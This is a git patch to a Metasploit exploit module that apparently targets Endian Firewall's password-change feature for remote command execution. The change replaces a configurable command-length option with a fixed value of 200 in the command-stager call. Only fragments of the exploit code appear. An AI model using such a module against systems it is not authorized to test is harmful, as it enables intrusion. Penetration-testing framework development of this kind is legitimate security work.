From adcd3c1e292e13e77aa24d19a1a1c4b92bb62d30 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 4 Sep 2015 16:18:55 -0500 Subject: [PATCH] Use static max length --- modules/exploits/linux/http/efw_chpasswd_exec.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/efw_chpasswd_exec.rb b/modules/exploits/linux/http/efw_chpasswd_exec.rb index 1ee69cd00f..a672faa153 100644 --- a/modules/exploits/linux/http/efw_chpasswd_exec.rb +++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb @@ -99,7 +99,6 @@ class Metasploit4 < Msf::Exploit::Remote 'Valid proxy account username for the target system']), OptString.new('EFW_PASSWORD', [true, 'Valid password for the proxy user account']), - OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 200]), OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']) ], self.class) @@ -120,8 +119,7 @@ class Metasploit4 < Msf::Exploit::Remote "please select a native payload") end - execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], - :nodelete => true) + execute_cmdstager(:linemax => 200, :nodelete => true) end def execute_command(cmd, opts)